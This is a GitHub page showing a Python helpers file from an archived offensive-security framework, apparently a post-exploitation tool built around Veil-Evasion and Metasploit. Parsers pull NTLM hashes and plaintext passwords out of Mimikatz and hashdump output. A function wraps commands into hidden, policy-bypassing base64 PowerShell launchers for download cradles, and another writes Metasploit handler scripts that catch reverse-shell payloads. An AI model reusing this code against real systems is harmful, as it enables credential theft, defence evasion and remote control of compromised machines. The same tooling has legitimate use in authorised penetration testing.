This repository has been archived by the owner on Jan 10, 2024. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 57
/
helpers.py
404 lines (301 loc) · 12.1 KB
/
helpers.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
"""
Reusable helpers that don't quite fit anywhere else.
"""
import zlib, re, textwrap, commands, datetime, time
import random, string, base64, os, socket
import settings
###############################################################
#
# Validation methods
#
###############################################################
def validHostname(hostname):
"""
Tries to validate a hostname.
"""
if len(hostname) > 255: return False
if hostname[-1:] == ".": hostname = hostname[:-1]
allowed = re.compile("(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
return all(allowed.match(x) for x in hostname.split("."))
def validIP(IP):
"""
Tries to validate an IP.
"""
try:
socket.inet_aton(IP)
return True
except:
return False
###############################################################
#
# Parsers
#
###############################################################
def parseMimikatz(data):
"""
Parse Mimikatz 2.0 output and return 4 lists:
msv1_0, kerberos, wdigest, and tspkg results found
"""
msv,tspkg,wdigest,kerberos = [],[],[],[]
# First, extract all msv ntlm hashes
p = re.compile('(?s)(?<=msv :).*?(?=tspkg :)')
msvMatches = [m for m in p.findall(data) if "Domain" in m]
for match in msvMatches:
msv_username,msv_domain,msv_ntlm = None,None,None
for line in match.split("\n"):
if "Username" in line:
t = line.split(":")[1].strip()
if not t.endswith("$"):
msv_username = line.split(":")[1].strip()
if "Domain" in line:
msv_domain = line.split(":")[1].strip()
if "NTLM" in line and (msv_ntlm != ""):
msv_ntlm = line.split(":")[1].strip()
if msv_username and msv_domain and msv_ntlm and len(msv_ntlm) == 32:
msv.append(msv_domain+"/"+msv_username+":"+msv_ntlm)
# Then extract all the tspkg plaintexts
p = re.compile('(?s)(?<=tspkg :).*?(?=wdigest :)')
tspkgMatches = [m for m in p.findall(data) if "Domain" in m]
for match in tspkgMatches:
tspkg_username,tspkg_domain,tspkg_password = None,None,None
for line in match.split("\n"):
if "Username" in line:
t = line.split(":")[1].strip()
if not t.endswith("$"):
tspkg_username = line.split(":")[1].strip()
if "Domain" in line:
tspkg_domain = line.split(":")[1].strip()
if "Password" in line:
tspkg_password = line.split(":")[1].strip()
if tspkg_username and tspkg_domain and tspkg_password and tspkg_password != "(null)" and len(tspkg_password)<66:
tspkg.append(tspkg_domain+"/"+tspkg_username+":"+tspkg_password)
# Then extract all the wdigest plaintexts
p = re.compile('(?s)(?<=wdigest :).*?(?=kerberos :)')
wdigestMatches = [m for m in p.findall(data) if "Domain" in m]
for match in wdigestMatches:
wdigest_username,wdigest_domain,wdigest_password = None,None,None
for line in match.split("\n"):
if "Username" in line:
t = line.split(":")[1].strip()
if not t.endswith("$"):
wdigest_username = line.split(":")[1].strip()
if "Domain" in line:
wdigest_domain = line.split(":")[1].strip()
if "Password" in line:
wdigest_password = line.split(":")[1].strip()
if wdigest_username and wdigest_domain and wdigest_password and wdigest_password != "(null)" and len(wdigest_password)<66:
wdigest.append(wdigest_domain+"/"+wdigest_username+":"+wdigest_password)
# Finally extract all the wdigest plaintexts
p = re.compile('(?s)(?<=kerberos :).*?(?=ssp :)')
kerberosMatches = [m for m in p.findall(data) if "Domain" in m]
for match in kerberosMatches:
kerberos_username,kerberos_domain,kerberos_password = None,None,None
for line in match.split("\n"):
if "Username" in line:
t = line.split(":")[1].strip()
if not t.endswith("$"):
kerberos_username = line.split(":")[1].strip()
if "Domain" in line:
kerberos_domain = line.split(":")[1].strip()
if "Password" in line:
kerberos_password = line.split(":")[1].strip()
if kerberos_username and kerberos_domain and kerberos_password and kerberos_password != "(null)" and len(kerberos_password)<66:
kerberos.append(kerberos_domain+"/"+kerberos_username+":"+kerberos_password)
# sort/uniquify everything
msv = sorted(set(msv))
tspkg = sorted(set(tspkg))
wdigest = sorted(set(wdigest))
kerberos = sorted(set(kerberos))
return (msv, tspkg, wdigest, kerberos)
def parseHashdump(data):
"""
Parse hashdump output and return a unique set of hashes.
"""
allhashes = []
pieces = data.split("\r\n\r\n")
if len(pieces) > 0:
if ":::" in pieces[0]:
# standarize the output
hashes = pieces[0].replace("\r\n","").split(":::")
hashes = [h for h in hashes if h != '']
# filter out the guest account
hashes = [h+":::" for h in hashes if ":501:" not in h]
# add these new hashes to the master set
allhashes.extend(hashes)
# uniquify everything
allhashes = sorted(set(allhashes))
return allhashes
####################################################################################
#
# Randomizers/obfuscators
#
####################################################################################
def randomString(length=-1):
"""
Returns a random string of "length" characters.
If no length is specified, resulting string is in between 6 and 15 characters.
"""
if length == -1: length = random.randrange(6,16)
random_string = ''.join(random.choice(string.ascii_letters) for x in range(length))
return random_string
def obfuscateNum(N, mod):
"""
Take a number and modulus and return an obsucfated form.
Returns a string of the obfuscated number N
"""
d = random.randint(1, mod)
left = int(N/d)
right = d
remainder = N % d
return "(%s*%s+%s)" %(left, right, remainder)
###############################################################
#
# Miscellaneous methods (formatting, sorting, etc.)
#
###############################################################
def updateActivityLog(data):
# the global activity log file location
activityFile = settings.PILLAGE_OUTPUT_PATH + "/activity.log"
timestamp = datetime.datetime.fromtimestamp(time.time()).strftime('%m.%d.%Y-%H:%M:%S')
# write everything out with a timestamp
f = open(activityFile, 'a')
f.write(timestamp + ": " + data)
f.close()
def updateCleanupLog(data):
# the global activity log file location
cleanupFile = settings.PILLAGE_OUTPUT_PATH + "/cleanup.pc"
# write everything out with a timestamp
f = open(cleanupFile, 'a')
f.write(data)
f.close()
def saveModuleFile(module, target, fileName, data):
"""
Called by a particular module, save 'data' to
PILLAGE_OUTPUT_PATH/module_name/TARGET/[timestamp]fileName
"""
timestamp = datetime.datetime.fromtimestamp(time.time()).strftime('%m.%d.%Y.%H%M%S')
# format is PILLAGE_OUTPUT_PATH/module_name/target/fileName
saveFolder = settings.PILLAGE_OUTPUT_PATH + module.__module__ + "/"+target+"/"
# make the save folder if it doesn't exist already
if not os.path.exists(saveFolder): os.makedirs(saveFolder)
finalName = saveFolder+timestamp+"."+fileName
f = open(finalName, 'w')
f.write(data)
f.close()
return finalName
def encPowershell(cmd,noArch=False):
"""
Take a powershell command, encode it properly with base64 and build
the architecture-independent launcher command.
noArch - don't do the architecture-independent launcher
"""
# encode the download cradle, weird unicode escaping shit
encCMD = base64.b64encode("".join([char + "\x00" for char in unicode(cmd)]))
triggerCMD = ""
# if we don't want the arch-independent launcher
if (noArch):
triggerCMD = "call powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + encCMD
else:
# get the correct powershell path and set it temporarily to %pspath%
triggerCMD = "if %PROCESSOR_ARCHITECTURE%==x86 (set pspath='') else (set pspath=%WinDir%\\syswow64\\windowspowershell\\v1.0\\)&"
# invoke powershell with the appropriate options
triggerCMD += "call %pspath%powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + encCMD
return triggerCMD
def lhost():
"""
Return the local IP.
"""
return commands.getoutput("/sbin/ifconfig").split("\n")[1].split()[1][5:]
def color(string, status=True, warning=False, bold=True):
"""
Change text color for the linux terminal, defaults to green.
Set "warning=True" for red - TODO: change this?
"""
attr = []
if status:
# green
attr.append('32')
if warning:
# red
attr.append('31')
if bold:
attr.append('1')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
def formatLong(title, message, frontTab=True, spacing=16):
"""
Print a long title:message with our standardized formatting.
Wraps multiple lines into a nice paragraph format.
Whether a front-tab is displayed is controlled by 'frontTab'
"""
lines = textwrap.wrap(textwrap.dedent(message).strip(), width=50)
returnString = ""
i = 1
if len(lines) > 0:
if frontTab:
returnString += "\t%s%s" % (('{0: <%s}'%spacing).format(title), lines[0])
else:
returnString += " %s%s" % (('{0: <%s}'%(spacing-1)).format(title), lines[0])
while i < len(lines):
if frontTab:
returnString += "\n\t"+' '*spacing+lines[i]
else:
returnString += "\n"+' '*spacing+lines[i]
i += 1
return returnString
def formatDesc(desc):
"""
Print a option description message in a nicely
wrapped and formatted paragraph.
"""
lines = textwrap.wrap(textwrap.dedent(desc).strip(), width=33)
returnString = lines[0]
i = 1
while i < len(lines):
returnString += "\n"+' '*40+lines[i]
i += 1
return returnString
def sortIPs(ips):
"""
Sorts a list of IPs in place.
TODO: check if list is all IPs, if not then don't sort
Taken from http://www.secnetix.de/olli/Python/tricks.hawk#sortips
"""
for i in range(len(ips)):
ips[i] = "%3s.%3s.%3s.%3s" % tuple(ips[i].split("."))
ips.sort()
for i in range(len(ips)):
ips[i] = ips[i].replace(" ", "")
def shellcodeToHandler(shellcode):
"""
Take a Veil-Evasion shellcode object, extract out options and build
a handler script if possible.
Handler script is written to '/tmp/handler.rc', overwriting what's there.
"""
handler = ""
# if custom shellcode was generated, can't do anything
if shellcode.customshellcode != "":
return handler
else:
# if the shellcode wasn't custom, build out a handler script
handler = "use exploit/multi/handler\n"
handler += "set PAYLOAD " + shellcode.msfvenompayload + "\n"
# extract LHOST if it's there
p = re.compile('LHOST=(.*?) ')
parts = p.findall(shellcode.msfvenomCommand)
if len(parts) > 0:
handler += "set LHOST " + parts[0] + "\n"
else:
# try to extract this local IP
handler += "set LHOST " + lhost() + "\n"
# extract LPORT if it's there
p = re.compile('LPORT=(.*?) ')
parts = p.findall(shellcode.msfvenomCommand)
if len(parts) > 0:
handler += "set LPORT " + parts[0] + "\n"
handler += "set ExitOnSession false\n"
# handler += "set AutoRunScript post/windows/manage/smart_migrate\n"
handler += "exploit -j\n"
f = open("/tmp/handler.rc", 'w')
f.write(handler)
f.close()
return "/tmp/handler.rc"